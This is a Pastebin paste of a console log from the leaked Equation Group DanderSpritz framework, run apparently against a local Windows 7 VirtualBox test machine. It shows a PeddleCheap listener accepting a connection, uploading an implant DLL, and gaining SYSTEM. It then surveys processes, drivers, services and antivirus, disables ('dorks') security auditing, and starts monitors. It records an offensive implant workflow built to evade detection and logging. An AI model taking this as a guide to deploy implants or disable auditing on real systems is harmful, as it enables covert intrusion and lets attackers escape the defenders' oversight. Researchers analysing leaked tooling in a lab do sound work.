API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Apr 28th, 2017
1,334
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 104.23 KB | None | 0 0
raw download clone embed print report
  1. [16:42:14] ID: 1 'script' started [target: z0.0.0.1]
  2. Loading module 154 (addr=z0.0.0.1 | type=dsz | file=Script_Lp.dll)
  3. Module loaded
  4. - --------------------------------------------------
  5.  
  6. - Getting remote time
  7. - RETRIEVED
  8. Running command 'version'
  9. Compiled :
  10. Listening Post : 1.3.0
  11. Implant : 1.3.0
  12. Base :
  13. DSZ 1.3.0 (1.3.0.0)
  14.  
  15. - --------------------------------------------------
  16. - Performing setup for i386-winnt on z0.0.0.1
  17. - --------------------------------------------------
  18. - DISABLED - Authentication (LOCAL)
  19. - DISABLED - DuplicateToken (LOCAL)
  20. - DISABLED - Authentication (CURRENT) "32-bit binary on 64-bit OS"
  21. - DISABLED - Oracle (LOCAL)
  22. - DISABLED - AppCompat (LOCAL)
  23. - DISABLED - InjectDll (LOCAL)
  24. - DISABLED - Pc_Status (LOCAL)
  25. - DISABLED - InjectDll (CURRENT) "32-bit binary on 64-bit OS"
  26. - DISABLED - Flav_Control (LOCAL)
  27. - DISABLED - kisu_install (CURRENT) "32-bit binary on 64-bit OS"
  28. - DISABLED - kisu_survey (CURRENT) "32-bit binary on 64-bit OS"
  29. - DISABLED - kisu_uninstall (CURRENT) "32-bit binary on 64-bit OS"
  30. - DISABLED - kisu_upgrade (CURRENT) "32-bit binary on 64-bit OS"
  31. - DISABLED - Break (LOCAL)
  32. - DISABLED - Psp_Avoidance (LOCAL) "32-bit binary on 64-bit OS"
  33. - DISABLED - QuitAndDelete (LOCAL)
  34. - DISABLED - Audit (LOCAL)
  35. - DISABLED - EventLogEdit (LOCAL)
  36. - DISABLED - GetAdmin (LOCAL)
  37. - DISABLED - Handles (LOCAL)
  38. - DISABLED - Hide (LOCAL)
  39. - DISABLED - Papercut (LOCAL)
  40. - DISABLED - PasswordDump (LOCAL)
  41. - DISABLED - Portmap (LOCAL)
  42. - DISABLED - ProcessModify (LOCAL)
  43. - DISABLED - ProcessOptions (LOCAL)
  44. - DISABLED - RunAsChild (LOCAL)
  45. - DISABLED - RunAsSystem (LOCAL)
  46. - DISABLED - Shutdown (LOCAL)
  47. - --------------------------------------------------
  48.  
  49. - Registering Mcl_NtElevation options
  50. - SUCCESS
  51. - Registering Mcl_NtNativeApi options
  52. - SUCCESS
  53. - Setting Mcl_NtNativeApi Type
  54. - WIN32
  55. - Registering Mcl_NtMemory options
  56. - SUCCESS
  57. - Setting Mcl_NtMemory Type
  58. - DrNi
  59. - Registering Mcl_ThreadInject options
  60. - SUCCESS
  61. - Setting Mcl_ThreadInject Type
  62. - DrNi
  63. - Getting host information
  64. - RETRIEVED
  65. - Getting OS GUID information
  66. - RETRIEVED
  67. - Storing host information
  68. - STORED
  69. - DISABLED - Authentication (LOCAL)
  70. Unable to get target DB for unknown target
  71.  
  72. - --------------------------------------------------
  73. - Registering global wrappers
  74. - --------------------------------------------------
  75. - hide - Windows kernel 6.0+ PatchGuard protection
  76. - packetredirect - Trigger failure alerter
  77. - --------------------------------------------------
  78. - Added Ops library to Python search path.
  79. - Local CP address is z0.0.0.1.
  80. - Setting environment variable OPS_PROJECTNAME to 'win7op'
  81. - Could not find DSZOpsDisk zip. Disk version NOT recorded.
  82. - 1 of 8 startup items indicated failure to execute correctly.
  83. - Session did not pass configuration sanity check. Close, clean up if necessary, and try again.
  84. [16:42:46] ID: 134 'pc_listen' started [target: z0.0.0.1]
  85. Loading module 158 (addr=z0.0.0.1 | type=dsz | file=PeddleCheap_Lp.dll)
  86. Module loaded
  87. Waiting for connection...
  88. Setting Sockopt
  89. Listening on [0.0.0.0]:443.
  90. Setting Sockopt
  91. Listening on [0.0.0.0]:80.
  92. Setting Sockopt
  93. Listening on [0.0.0.0]:53.
  94. Setting Sockopt
  95. Listening on [0.0.0.0]:1509.
  96. Connection received from [192.168.1.58]:49172 to [192.168.1.3]:443...
  97. Connection accepted
  98. Starting session...
  99. PC LP Version: 2.3.0
  100. LP...ready to send the MAGIC NUMBER
  101. Sending additional 363 bytes of random
  102. LP ...ready to receive the symmetric key
  103. LP...ready to decrypt the key
  104.  
  105. Remote Information
  106. PC Version : 2.3.0
  107. PC Id : 0x0000000000000000
  108. Arch-Os : i386-winnt (compiled i386-winnt)
  109. Session Key : ca 43 78 e9 9b f8 94 24 00 1d 26 37 52 eb ee 62
  110.  
  111. Getting remote OS information
  112.  
  113. Remote OS
  114. Arch : i386
  115. Compiled Arch : i386
  116. Platform : winnt
  117. Compiled Platform : winnt
  118. Version : 6.1 (Windows 7)
  119. Service Pack : 1
  120. C Lib Version : 6.0.0
  121.  
  122. Sending OS version check status to remote side (4 bytes)
  123. Data (OS version check status) has been sent
  124. Data (OS version check status) has been received and stored by remote side
  125.  
  126. Ready to send implant
  127. Successfully loaded LP DLLs
  128.  
  129. Payload
  130. File Name : C:\Users\kbroo\Desktop\Stardust\EQGRP-master\windows\Resources\Pc\/../Dsz/Payloads/Files/i386-winnt-vc9s/release/Dsz_Implant_Pc.dll
  131. Send payload : true
  132. Original Size : 248832
  133. Send Size : 137488
  134. Checksum : c745
  135. Name :
  136. Path :
  137. Export : #1
  138.  
  139.  
  140. Sending PayloadInfo run type information
  141. Sending File/Library info to remote side (36 bytes)
  142. Data (File/Library info) has been sent
  143. Data (File/Library info) has been received and stored by remote side
  144.  
  145. Sending Export name to remote side (3 bytes)
  146. Data (Export name) has been sent
  147. Data (Export name) has been received and stored by remote side
  148.  
  149. Sending Payload to remote side (137488 bytes)
  150. Data (Payload) has been sent
  151. Data (Payload) has been received and stored by remote side
  152.  
  153. ... Receiving Acknowledgements
  154.  
  155. Received successful status message for Dll/Exe loaded
  156. Received successful status message for About to run payload
  157. Received successful status message for Exit This Message Loop
  158.  
  159.  
  160. Setting remote address to z0.0.0.11
  161. Remote Address : z0.0.0.11
  162. Architecture : i386
  163. Compiled Architecture : i386
  164. Platform : winnt
  165. Version : 6.1.1 (build 7601)
  166. C Library Version : 6.0.0
  167. Process Id : 448
  168. Type : Dsz
  169. Metadata : type=PC local=192.168.1.3:443 remote=192.168.1.58:49172
  170.  
  171. - Remote host is i386-winnt (6.1.1)
  172. - --------------------------------------------------
  173. - Performing setup for i386-winnt on z0.0.0.11
  174. - --------------------------------------------------
  175. - PROMPTED - Shutdown (CURRENT)
  176. - Registering Mcl_NtElevation options
  177. - SUCCESS
  178. - Setting Mcl_NtElevation Type
  179. - EpMe_GrSa
  180. - Registering Mcl_NtNativeApi options
  181. - SUCCESS
  182. - Setting Mcl_NtNativeApi Type
  183. - WIN32
  184. - Registering Mcl_NtMemory options
  185. - SUCCESS
  186. - Setting Mcl_NtMemory Type
  187. - Std
  188. - Registering Mcl_ThreadInject options
  189. - SUCCESS
  190. - Setting Mcl_ThreadInject Type
  191. - Std
  192. Unable to get target DB for unknown target
  193. Able to load audit plugin, NT_ELEVATION loaded correctly, moving on
  194. - Current process options (0x4d)
  195. - DisableExceptionChainValidation
  196. - DisableThunkEmulation
  197. - ExecutionDisabled
  198. - Permanent
  199. Do you want to modify the process options?
  200. YES
  201. - Verifying elevated 'query' results in 0x4d
  202. - PASSED
  203. - Modifying process options
  204. - Process options modified
  205. - DISABLED - Authentication (CURRENT)
  206. - --------------------------------------------------
  207.  
  208. - Getting remote time
  209. - RETRIEVED
  210. - Getting host information
  211. - RETRIEVED
  212. - Getting OS GUID information
  213. - RETRIEVED
  214. - Storing host information
  215. - STORED
  216. - User is SYSTEM
  217. -
  218. --------------------------------------------------
  219.  
  220. Running command 'python Connected/Connected.py -project Ops'
  221. Unable to get target DB for unknown target
  222. - --------------------------------------------------
  223. - Re-registering global wrappers for current target
  224. - --------------------------------------------------
  225. - hide - Windows kernel 6.0+ PatchGuard protection
  226. - packetredirect - Trigger failure alerter
  227. - --------------------------------------------------
  228. Showing you what we know so you can make a good decision in the menu below
  229. crypto_guid: 6b166207-b512-4e13-8840-14fba0047b28
  230. hostname: IE11Win7
  231. macs: [u'08-00-27-61-eb-58']
  232. implant_id: 0x0000000000000000
  233.  
  234. Below match threshold or multiple matches. You must choose. Choose wisely.
  235.  
  236. 0) None of these - create a new target db
  237.  
  238. 1) (Confidence: 0.8) explorenewworlds / IE11Win7 / PC ID 0x0000000000000000 / 6b166207-b512-4e13-8840-14fba0047b28 / MACS: ['08-00-27-61-eb-58']
  239. 2) (Confidence: 0.8) test / IE11Win7 / PC ID 0x0000000000000000 / 6b166207-b512-4e13-8840-14fba0047b28 / MACS: ['08-00-27-61-eb-58']
  240.  
  241. Enter selection:
  242. 0
  243. - [2017-04-28 09:48:08 z0.0.0.11] This looks like a new target, and I have no idea where to put it.
  244.  
  245. 0) Input project name manually
  246.  
  247. 1) dszopsdisk
  248. 2) dszopsdisk-1
  249. 3) explorenewworlds
  250. 4) explornewworlds
  251. 5) guirequestlog
  252. 6) guisystemlog
  253. 7) logs
  254. 8) op1
  255. 9) test
  256. 10) win7op
  257.  
  258. Enter selection:
  259. 10
  260. - [2017-04-28 09:48:14 z0.0.0.11] Target ID completed, ID 60877f4d-baab-4ebe-a6b3-b2d6e7ebe044 (in project win7op)
  261. ====================================================================
  262. - [2017-04-28 09:48:15 z0.0.0.11] Showing ifconfig data so you can make sure you are on the correct target
  263. FQDN: IE11Win7
  264. DNS Servers: 192.168.1.1
  265. - [2017-04-28 09:48:16 z0.0.0.11] Showing all non-local and non-tunnel encapsulation adapter information, see command 222 for full interface list
  266. | Description | MAC | IP | Netmask | Gateway | DHCP Server | Name |
  267. +--------------------------------------+-------------------+--------------+---------------+---------------------------------+-------------+------------------------------------------------------------------+
  268. | Intel(R) PRO/1000 MT Desktop Adapter | 08-00-27-61-EB-58 | 192.168.1.58 | 255.255.255.0 | fe80::267f:20ff:fecc:26ba%%%%13 | 192.168.1.1 | Local Area Connection 2 ({A2692622-D935-45DD-BC6A-0FEA4F88524C}) |
  269. Running command 'survey -run C:\Users\kbroo\Desktop\Stardust\EQGRP-master\windows\Resources\Ops\Data\survey.xml -sections env-setup -quiet'
  270. Running command 'systemversion '
  271. Architecture : i386
  272. OS Family : winnt
  273. Version : 6.1 (Build 7601)
  274. Platform : Windows 7
  275. Service Pack : 1.0
  276. Extra Info : Service Pack 1
  277. Product Type : Workstation / Professional
  278. Terminal Services is installed, but only one interactive session is supported.
  279.  
  280. Command completed successfully
  281. - [2017-04-28 09:48:18 z0.0.0.11] Loaded safety handlers from previous op(s)
  282.  
  283.  
  284. Command completed successfully
  285. Running command 'survey -run'
  286.  
  287. - [2017-04-28 09:48:19 z0.0.0.11] ================================== Process list ==================================================================
  288. - [2017-04-28 09:48:22 z0.0.0.11] Data age: 01 seconds - data is fresh
  289. - | PID | PPID | Full Path | User | Comment |
  290. - +------+------+----------------------------------------------------------+------------------------------+------------------------------------------------------------+
  291. - | 0 | 0 | | | |
  292. - | 4 | 0 | System | | System Kernel |
  293. - | 224 | 4 | ---\SystemRoot\System32\smss.exe | NT AUTHORITY\SYSTEM | Session Manager Subsystem |
  294. - | 296 | 288 | C:\Windows\system32\csrss.exe | NT AUTHORITY\SYSTEM | Client-Server Runtime Server Subsystem |
  295. - | 344 | 336 | C:\Windows\system32\csrss.exe | NT AUTHORITY\SYSTEM | Client-Server Runtime Server Subsystem |
  296. - | 352 | 288 | C:\Windows\system32\wininit.exe | NT AUTHORITY\SYSTEM | Vista background service launcher |
  297. - | 440 | 352 | ---C:\Windows\system32\services.exe | NT AUTHORITY\SYSTEM | Windows Service Controller |
  298. - | 548 | 440 | ------C:\Windows\system32\svchost.exe | NT AUTHORITY\SYSTEM | Microsoft Service Host Process (Check path in processdeep) |
  299. - | 616 | 440 | ------C:\Windows\system32\VBoxService.exe | NT AUTHORITY\SYSTEM | |
  300. - | 680 | 440 | ------C:\Windows\system32\svchost.exe | NT AUTHORITY\NETWORK SERVICE | Microsoft Service Host Process (Check path in processdeep) |
  301. - | 784 | 440 | ------C:\Windows\System32\svchost.exe | NT AUTHORITY\LOCAL SERVICE | Microsoft Service Host Process (Check path in processdeep) |
  302. - | 824 | 440 | ------C:\Windows\System32\svchost.exe | NT AUTHORITY\SYSTEM | Microsoft Service Host Process (Check path in processdeep) |
  303. - | 2076 | 824 | ---------C:\Windows\system32\Dwm.exe | IE11WIN7\IEUser | Vista Desktop Window Manager |
  304. - | 848 | 440 | ------C:\Windows\system32\svchost.exe | NT AUTHORITY\LOCAL SERVICE | Microsoft Service Host Process (Check path in processdeep) |
  305. - | 872 | 440 | ------C:\Windows\system32\svchost.exe | NT AUTHORITY\SYSTEM | Microsoft Service Host Process (Check path in processdeep) |
  306. - | 1132 | 440 | ------C:\Windows\system32\svchost.exe | NT AUTHORITY\NETWORK SERVICE | Microsoft Service Host Process (Check path in processdeep) |
  307. - | 1256 | 440 | ------C:\Windows\System32\spoolsv.exe | NT AUTHORITY\SYSTEM | Microsoft Printer Spooler Service |
  308. - | 1288 | 440 | ------C:\Windows\system32\svchost.exe | NT AUTHORITY\LOCAL SERVICE | Microsoft Service Host Process (Check path in processdeep) |
  309. - | 1412 | 440 | ------C:\Windows\system32\vmicsvc.exe | NT AUTHORITY\NETWORK SERVICE | |
  310. - | 1436 | 440 | ------C:\Windows\system32\vmicsvc.exe | NT AUTHORITY\LOCAL SERVICE | |
  311. - | 1456 | 440 | ------C:\Windows\system32\vmicsvc.exe | NT AUTHORITY\SYSTEM | |
  312. - | 1480 | 440 | ------C:\Windows\system32\vmicsvc.exe | NT AUTHORITY\LOCAL SERVICE | |
  313. - | 1504 | 440 | ------C:\Windows\system32\vmicsvc.exe | NT AUTHORITY\SYSTEM | |
  314. - | 1600 | 440 | ------C:\Windows\system32\wlms\wlms.exe | NT AUTHORITY\SYSTEM | |
  315. - | 1912 | 440 | ------C:\Windows\system32\sppsvc.exe | NT AUTHORITY\NETWORK SERVICE | Microsoft Software Protection Platform Service |
  316. - | 252 | 440 | ------C:\Windows\system32\svchost.exe | NT AUTHORITY\NETWORK SERVICE | Microsoft Service Host Process (Check path in processdeep) |
  317. - | 1652 | 440 | ------C:\Windows\system32\taskhost.exe | IE11WIN7\IEUser | Windows 7 Generic Host Process |
  318. - | 2636 | 440 | ------C:\Windows\system32\SearchIndexer.exe | NT AUTHORITY\SYSTEM | Microsoft search indexer |
  319. - | 2764 | 440 | ------C:\Program Files\Windows Media Player\wmpnetwk.exe | NT AUTHORITY\NETWORK SERVICE | Windows Media Player Network Sharing Service |
  320. - | 2936 | 440 | ------C:\Windows\system32\svchost.exe | NT AUTHORITY\LOCAL SERVICE | Microsoft Service Host Process (Check path in processdeep) |
  321. - | 3616 | 440 | ------C:\Windows\System32\svchost.exe | NT AUTHORITY\SYSTEM | Microsoft Service Host Process (Check path in processdeep) |
  322. - | 448 | 352 | ---C:\Windows\system32\lsass.exe | NT AUTHORITY\SYSTEM | Local Security Authority Server Subsystem |
  323. - | 456 | 352 | ---C:\Windows\system32\lsm.exe | NT AUTHORITY\SYSTEM | Vista Local Session Manager |
  324. - | 384 | 336 | C:\Windows\system32\winlogon.exe | NT AUTHORITY\SYSTEM | Microsoft Windows Logon Process |
  325. - | 2108 | 2056 | C:\Windows\Explorer.EXE | IE11WIN7\IEUser | Windows Explorer Shell |
  326. - | 2360 | 2108 | ---C:\Windows\System32\VBoxTray.exe | IE11WIN7\IEUser | |
  327. background python monitorwrap.py -args "-g -t OPS_PROCESS_MONITOR_TAG -i 5 -s \"processes -monitor \" "
  328.  
  329. - [2017-04-28 09:48:23 z0.0.0.11] ===================================== Uptime =====================================================================
  330. Uptime: 0 days, 0:15:46
  331.  
  332. - [2017-04-28 09:48:25 z0.0.0.11] ================== Auditing status check, dorking will be later ==================================================
  333. - [2017-04-28 09:48:25 z0.0.0.11] 1 safety handler registered for audit
  334. - [2017-04-28 09:48:26 z0.0.0.11] Data age: 00 seconds - data is fresh
  335. - [2017-04-28 09:48:27 z0.0.0.11] Auditing is enabled on this machine
  336. | Category | Success | Failure |
  337. +-----------------------------------+---------+---------+
  338. | System_SecurityStateChange | True | False |
  339. | System_Integrity | True | True |
  340. | System_Others | True | True |
  341. | Logon_Logon | True | False |
  342. | Logon_Logoff | True | False |
  343. | Logon_AccountLockout | True | False |
  344. | Logon_SpecialLogon | True | False |
  345. | Logon_NPS | True | True |
  346. | PolicyChange_AuditPolicy | True | False |
  347. | PolicyChange_AuthenticationPolicy | True | False |
  348. | AccountManagement_UserAccount | True | False |
  349. | AccountManagement_SecurityGroup | True | False |
  350. - [2017-04-28 09:48:27 z0.0.0.11] The above is only being shown for informational purposes, you will be prompted about dorking later
  351.  
  352. - [2017-04-28 09:48:27 z0.0.0.11] =================================== Driver list ===================================================================
  353. Running command 'python C:\Users\kbroo\Desktop\Stardust\EQGRP-master\windows\Resources\Ops\PyScripts\driverlist.py -project Ops -args "-nofreshscan"'
  354. - [2017-04-28 09:48:28 z0.0.0.11] 1 safety handler registered for drivers
  355. - | Driver | Path | Flags | Comment | Type | First Seen | Also On |
  356. - +------------------------------------------+-----------------------------+--------------------------+----------------------------------------------------+---------+------------+-------------------+
  357. - | api-ms-win-downlevel-normaliz-l1-1-0.dll | C:\Windows\system32 | NEW,UNIDENTIFIED,NO_HASH | | | 2017-04-28 | IE11Win7,IE11Win7 |
  358. - | api-ms-win-downlevel-user32-l1-1-0.dll | C:\Windows\system32 | NEW,UNIDENTIFIED,NO_HASH | | | 2017-04-28 | IE11Win7,IE11Win7 |
  359. - | dump_atapi.sys | C:\Windows\system32\drivers | NEW,RANDOM,NO_HASH | !!! POSSIBLE driver mem dump !!! | WARNING | 2017-04-28 | IE11Win7,IE11Win7 |
  360. - | dump_dumpata.sys | C:\Windows\system32\drivers | NEW,RANDOM,NO_HASH | !!! POSSIBLE driver mem dump !!! | WARNING | 2017-04-28 | IE11Win7,IE11Win7 |
  361. - | dump_dumpfve.sys | C:\Windows\system32\drivers | NEW,RANDOM,NO_HASH | !!! POSSIBLE driver mem dump !!! | WARNING | 2017-04-28 | IE11Win7,IE11Win7 |
  362. - | userenv.dll | C:\Windows\system32 | NEW,UNIDENTIFIED,NO_HASH | | | 2017-04-28 | IE11Win7,IE11Win7 |
  363. - | vboxdisp.dll | C:\Windows\system32 | NEW,UNIDENTIFIED,NO_HASH | | | 2017-04-28 | IE11Win7,IE11Win7 |
  364. - | vboxguest.sys | C:\Windows\system32\drivers | NAME_MATCH,NEW | Oracle VM VirtualBox Guest Additions Driver | NORMAL | 2017-04-28 | IE11Win7,IE11Win7 |
  365. - | vboxmouse.sys | C:\Windows\system32\drivers | NAME_MATCH,NEW | Oracle VM VirtualBox Mouse Filter Driver | NORMAL | 2017-04-28 | IE11Win7,IE11Win7 |
  366. - | vboxsf.sys | C:\Windows\system32\drivers | NAME_MATCH,NEW | Oracle VM VirtualBox Shared Folders Minirdr Driver | NORMAL | 2017-04-28 | IE11Win7,IE11Win7 |
  367. - | vboxvideo.sys | C:\Windows\system32\drivers | NAME_MATCH,NEW | Oracle VM VirtualBox Video Driver | NORMAL | 2017-04-28 | IE11Win7,IE11Win7 |
  368.  
  369. Command completed successfully
  370.  
  371. - [2017-04-28 09:48:53 z0.0.0.11] =============================== Installed software ===============================================================
  372.  
  373. - --------------------------------------------------------------- Installer Packages ---------------------------------------------------------------
  374. - [2017-04-28 09:48:54 z0.0.0.11] Data age: 01 seconds - data is fresh
  375. | Arcitecture | Name | Description | Installed version | Date installed |
  376. +-------------+---------------------------------------------+-----------------------+-------------------+----------------+
  377. | 32-bit | Microsoft .NET Framework 4 Client Profile | Microsoft Corporation | 4.0.30319 | |
  378. | 32-bit | Microsoft .NET Framework 4 Client Profile | Microsoft Corporation | 4.0.30319 | 2014-11-21 |
  379. | 32-bit | Oracle VM VirtualBox Guest Additions 4.3.12 | Oracle Corporation | 4.3.12.0 | |
  380.  
  381. - ----------------------------------------------------------------- Software key(s) -----------------------------------------------------------------
  382. - [2017-04-28 09:48:55 z0.0.0.11] Data age: 00 seconds - data is fresh
  383. | Architecture | Name | Last update |
  384. +--------------+------------------------+-------------+
  385. | 32-bit | ATI Technologies | 2009-07-14 |
  386. | 32-bit | Classes | 2014-11-26 |
  387. | 32-bit | Clients | 2009-07-14 |
  388. | 32-bit | Intel | 2009-07-14 |
  389. | 32-bit | Microsoft | 2017-04-28 |
  390. | 32-bit | MozillaPlugins | 2013-10-23 |
  391. | 32-bit | ODBC | 2009-07-14 |
  392. | 32-bit | Oracle | 2014-11-26 |
  393. | 32-bit | Policies | 2009-07-14 |
  394. | 32-bit | RegisteredApplications | 2009-07-14 |
  395. | 32-bit | Sonic | 2009-07-14 |
  396.  
  397. - -------------------------------------------------------------- Program files dir(s) --------------------------------------------------------------
  398. - [2017-04-28 09:48:57 z0.0.0.11] Data age: 01 seconds - data is fresh
  399. | Architecture | Folder Name | Modified |
  400. +--------------+--------------------------+-------------------------------+
  401. | 32-bit | Common Files | 2009-07-14T02:37:05.485289900 |
  402. | 32-bit | DVD Maker | 2013-10-23T19:17:04.354000000 |
  403. | 32-bit | Internet Explorer | 2014-11-26T19:47:13.343750000 |
  404. | 32-bit | Microsoft.NET | 2013-10-23T17:55:12.097875000 |
  405. | 32-bit | MSBuild | 2009-07-14T04:52:30.938524700 |
  406. | 32-bit | Oracle | 2014-11-26T21:42:36.486305600 |
  407. | 32-bit | Reference Assemblies | 2009-07-14T04:52:30.938524700 |
  408. | 32-bit | Uninstall Information | 2009-07-14T04:53:23.912062200 |
  409. | 32-bit | Windows Defender | 2013-10-23T20:51:10.385625000 |
  410. | 32-bit | Windows Journal | 2014-11-22T01:41:33.521125000 |
  411. | 32-bit | Windows Mail | 2013-10-23T19:17:04.525875000 |
  412. | 32-bit | Windows Media Player | 2013-10-23T19:16:59.307125000 |
  413. | 32-bit | Windows NT | 2009-07-14T04:52:30.954124700 |
  414. | 32-bit | Windows Photo Viewer | 2013-10-23T19:16:59.213375000 |
  415. | 32-bit | Windows Portable Devices | 2013-10-23T19:16:59.338375000 |
  416. | 32-bit | Windows Sidebar | 2013-10-23T19:17:04.479000000 |
  417.  
  418. - [2017-04-28 09:48:58 z0.0.0.11] ================================ Running services ================================================================
  419. - [2017-04-28 09:48:59 z0.0.0.11] Data age: 01 seconds - data is fresh
  420. | Display name | Service name |
  421. +--------------------------------------------------+----------------------+
  422. | Windows Audio Endpoint Builder | AudioEndpointBuilder |
  423. | Windows Audio | Audiosrv |
  424. | Base Filtering Engine | BFE |
  425. | Computer Browser | Browser |
  426. | Certificate Propagation | CertPropSvc |
  427. | Cryptographic Services | CryptSvc |
  428. | Offline Files | CscService |
  429. | DCOM Server Process Launcher | DcomLaunch |
  430. | DHCP Client | Dhcp |
  431. | DNS Client | Dnscache |
  432. | Diagnostic Policy Service | DPS |
  433. | Windows Event Log | eventlog |
  434. | COM+ Event System | EventSystem |
  435. | Function Discovery Provider Host | fdPHost |
  436. | Function Discovery Resource Publication | FDResPub |
  437. | Windows Font Cache Service | FontCache |
  438. | Group Policy Client | gpsvc |
  439. | HomeGroup Provider | HomeGroupProvider |
  440. | IKE and AuthIP IPsec Keying Modules | IKEEXT |
  441. | IP Helper | iphlpsvc |
  442. | Server | LanmanServer |
  443. | Workstation | LanmanWorkstation |
  444. | TCP/IP NetBIOS Helper | lmhosts |
  445. | Windows Firewall | MpsSvc |
  446. | Network Connections | Netman |
  447. | Network List Service | netprofm |
  448. | Network Location Awareness | NlaSvc |
  449. | Network Store Interface Service | nsi |
  450. | Plug and Play | PlugPlay |
  451. | IPsec Policy Agent | PolicyAgent |
  452. | Power | Power |
  453. | User Profile Service | ProfSvc |
  454. | RPC Endpoint Mapper | RpcEptMapper |
  455. | Remote Procedure Call (RPC) | RpcSs |
  456. | Security Accounts Manager | SamSs |
  457. | Task Scheduler | Schedule |
  458. | System Event Notification Service | SENS |
  459. | Remote Desktop Configuration | SessionEnv |
  460. | Shell Hardware Detection | ShellHWDetection |
  461. | Print Spooler | Spooler |
  462. | Software Protection | sppsvc |
  463. | SSDP Discovery | SSDPSRV |
  464. | Remote Desktop Services | TermService |
  465. | Themes | Themes |
  466. | Distributed Link Tracking Client | TrkWks |
  467. | Remote Desktop Services UserMode Port Redirector | UmRdpService |
  468. | Desktop Window Manager Session Manager | UxSms |
  469. | VirtualBox Guest Additions Service | VBoxService |
  470. | Hyper-V Heartbeat Service | vmicheartbeat |
  471. | Hyper-V Data Exchange Service | vmickvpexchange |
  472. | Hyper-V Guest Shutdown Service | vmicshutdown |
  473. | Hyper-V Time Synchronization Service | vmictimesync |
  474. | Hyper-V Volume Shadow Copy Requestor | vmicvss |
  475. | Diagnostic Service Host | WdiServiceHost |
  476. | Diagnostic System Host | WdiSystemHost |
  477. | Windows Defender | WinDefend |
  478. | WinHTTP Web Proxy Auto-Discovery Service | WinHttpAutoProxySvc |
  479. | Windows Management Instrumentation | Winmgmt |
  480. | Windows Licensing Monitoring Service | WLMS |
  481. | Windows Media Player Network Sharing Service | WMPNetworkSvc |
  482. | Security Center | wscsvc |
  483. | Windows Search | WSearch |
  484. | Windows Update | wuauserv |
  485.  
  486. - [2017-04-28 09:49:00 z0.0.0.11] =================================== AV Check!!! ===================================================================
  487. Running command 'python windows\checkpsp.py -project Ops '
  488. - Checking for any running known PSP's...
  489. - microsoft
  490. -
  491.  
  492. - Checking for target PSP history...
  493.  
  494. - No target history found.
  495.  
  496. - Saw PSP's we can act on. Running scripts.
  497. - ============================================
  498. - = microsoft =
  499. - ============================================
  500. - Checking for a change in configuration
  501.  
  502. - The following PSPs were NEWLY ADDED to target:
  503. - Microsoft Windows Defender Windows 7 Enterprise
  504. - +--------------------+----------------------+
  505. - | | Setting Value |
  506. - +--------------------+----------------------+
  507. - | Vendor | Microsoft |
  508. - | Product | Windows Defender |
  509. - | Version | Windows 7 Enterprise |
  510. - | Definition Updates | None |
  511. - | Information | None |
  512. - | Install Date | None |
  513. - | Log File | None |
  514. - | Quarantine | None |
  515. - | ServiceStart | 2 |
  516. - | Software | PSP |
  517. - | SpyNet | 1 |
  518. - | Status | Enabled |
  519. - +--------------------+----------------------+
  520.  
  521. Command completed successfully
  522.  
  523. - [2017-04-28 09:49:11 z0.0.0.11] ================================ Auditing dorking ================================================================
  524. - [2017-04-28 09:49:11 z0.0.0.11] Data age: 45 seconds (from local cache, re-run manually if you need to)
  525. - [2017-04-28 09:49:11 z0.0.0.11] Auditing is enabled on this machine
  526. | Category | Success | Failure |
  527. +-----------------------------------+---------+---------+
  528. | System_SecurityStateChange | True | False |
  529. | System_Integrity | True | True |
  530. | System_Others | True | True |
  531. | Logon_Logon | True | False |
  532. | Logon_Logoff | True | False |
  533. | Logon_AccountLockout | True | False |
  534. | Logon_SpecialLogon | True | False |
  535. | Logon_NPS | True | True |
  536. | PolicyChange_AuditPolicy | True | False |
  537. | PolicyChange_AuthenticationPolicy | True | False |
  538. | AccountManagement_UserAccount | True | False |
  539. | AccountManagement_SecurityGroup | True | False |
  540. Do you want to dork security auditing?
  541. YES
  542. - [2017-04-28 09:49:34 z0.0.0.11] Security auditing dorked, do not stop command 311 or you will lose your blessing
  543.  
  544. - [2017-04-28 09:49:34 z0.0.0.11] ==================================== Monitors ====================================================================
  545. Monitors
  546. -----------------------------
  547. 1) Full - arp, netstat, activity
  548. 2) Netstat and activity
  549. 3) Activity only
  550.  
  551. 4) Done
  552.  
  553. Select your monitors (full recommended for most situations): [1]
  554. Staring a monitor with activity -monitor
  555. - [2017-04-28 09:49:41 z0.0.0.11] Activity monitor started (or already running)
  556. Staring a monitor with netconnections -monitor
  557. - [2017-04-28 09:49:42 z0.0.0.11] Netconnections monitor started (or already running)
  558. z0.0.0.11: [2017-04-28 09:49:43] Hashhunter completed on IE11Win7!
  559. Staring a monitor with arp -delay 10s -monitor
  560. - [2017-04-28 09:49:44 z0.0.0.11] Arp monitor started (or already running)
  561. - [2017-04-28 09:49:45 z0.0.0.11] Process deep started in the background as command ID 329.
  562. - [2017-04-28 09:49:45 z0.0.0.11] Informational SIG check started in the background as command ID 330.
  563.  
  564. - [2017-04-28 09:49:45 z0.0.0.11] ================================ Scheduler survey ================================================================
  565. - [2017-04-28 09:49:57 z0.0.0.11] Data age: 09 seconds (from local cache, re-run manually if you need to)
  566. | source | command | nextrun | triggers | runas | jobname |
  567. +---------+-------------------------------------------------------------------------------------------------------------------------------------------+-----------------------------------------------+-----------------------------------------------+-----------------------+------------------------------------------------------------------------------------------------------+
  568. | SERVICE | COM job ClassID and data: {BF5CB148-7C77-4D8A-A53E-D81C70CF743C} - | LOGON | LOGON | LEAST | Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Manual) |
  569. | SERVICE | aitagent (runs in "") | DAILY 2007-10-08T02:30:00 | DAILY 2007-10-08T02:30:00 | SYSTEM LEAST | Application Experience\AitAgent |
  570. | SERVICE | %%%%windir%%%%\system32\rundll32.exe aepdu.dll,AePduRunUpdate (runs in "") | DAILY 2007-10-08T00:30:00 | DAILY 2007-10-08T00:30:00 | SYSTEM LEAST | Application Experience\ProgramDataUpdater |
  571. | SERVICE | %%%%windir%%%%\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations (runs in "") | BOOT | BOOT | LOCAL SERVICE LEAST | Autochk\Proxy |
  572. | SERVICE | BthUdTask.exe $(Arg0) (runs in "") | | | SYSTEM LEAST | Bluetooth\UninstallDeviceTask |
  573. | SERVICE | COM job ClassID and data: {58FB76B9-AC85-4E55-AC04-427593B1D060} - SYSTEM | EVENT , REGISTRATION , BOOT | EVENT , REGISTRATION , BOOT | SYSTEM LEAST | CertificateServicesClient\SystemTask |
